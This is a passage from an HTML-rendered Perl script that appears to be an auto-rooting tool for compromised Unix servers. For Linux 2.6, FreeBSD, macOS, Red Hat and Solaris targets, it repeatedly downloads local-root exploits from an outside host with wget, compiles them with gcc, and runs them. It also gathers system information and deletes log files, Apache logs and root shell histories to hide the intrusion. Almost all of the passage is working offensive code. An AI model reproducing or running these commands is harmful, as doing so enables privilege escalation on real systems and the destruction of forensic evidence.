2.6.17;./2.6.17"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct5.sh;chmod 777 prct5.sh;./prct5.sh"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root;chmod 777 root;./root"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/cw7.3;chmod 777 cw7.3;./cw7.3"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x;chmod 777 x;./x"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x2;chmod 777 x2;./x2"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/exp.sh;chmod 777 exp.sh;./exp.sh"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root2;chmod 777 root2;./root2"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"id"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;freebsd&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/bsd;chmod 777 bsd;./bsd"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/48local;chmod 777 48local;./48local"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/exploit;chmod 777 exploit;./exploit"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/freedbs5.3;chmod 777 freedbs5.3;./freedbs5.3"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"id"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;mac&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir mac;chmod 777 mac;cd mac;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/mac/macosX;chmod 777 macosX;./macosX"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"id"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;red&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/afd-expl.c;gcc afd-expl.c -o afd-expl;chmod 777 afd-expl;./afd-expl"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/alsaplayer-suid.c;gcc alsaplayer-suid.c -o alsaplayer-suid;chmod 777 alsaplayer-suid;./alsaplayer-suid"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/nslconf.c;gcc nslconf.c -o nslconf;chmod 777 nslconf;./nslconf"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ohMy-another-efs;chmod 777 ohMy-another-efs;./ohMy-another-efs"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/0x82-Remote.tannehehe.xpl.c;gcc 0x82-Remote.tannehehe.xpl.c -o 0x82-Remote.tannehehe.xpl;chmod 777 0x82-Remote.tannehehe.xpl;./0x82-Remote.tannehehe.xpl"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/efs_local;chmod 777 efs_local;./efs_local"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ifenslave;chmod 777 ifenslave;./ifenslave"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/crontab.c;gcc crontab.c -o crontab;chmod 777 crontab;./crontab"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/epcs2.c;gcc epcs2.c -o epcs2;chmod 777 epcs2;./epcs2"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/rh71sm8.c;gcc rh71sm8.c -o rh71sm8;chmod 777 rh71sm8;./rh71sm8"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"id"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;sun&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/solaris27;chmod 777 solaris27;./solaris27"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/final;chmod 777 final;./final"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos59;chmod 777 sunos59;./sunos59"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos510.c;gcc sunos510.c -o sunos510;chmod 777 sunos510;./sunos510"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"id"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;sysinfo&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt; &lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"dmesg"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;   &lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"set"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;     &lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"uname -a"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;      &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;       &lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"uname -r"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;      &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;     &lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"ifconfig"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;   &lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;gccinfo&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt; &lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"locate gcc"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;   &lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;sysproc&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt; &lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"ps aux"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;   &lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;logc&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /tmp/logs"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf $HISTFILE"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /root/.ksh_history"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /root/.bash_history"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /root/.bash_logout"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /usr/local/apache/logs"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/sleep.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;sleep&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;2&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /usr/local/apache/log"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /var/apache/logs"&lt;/span&gt;&lt;span style="color: 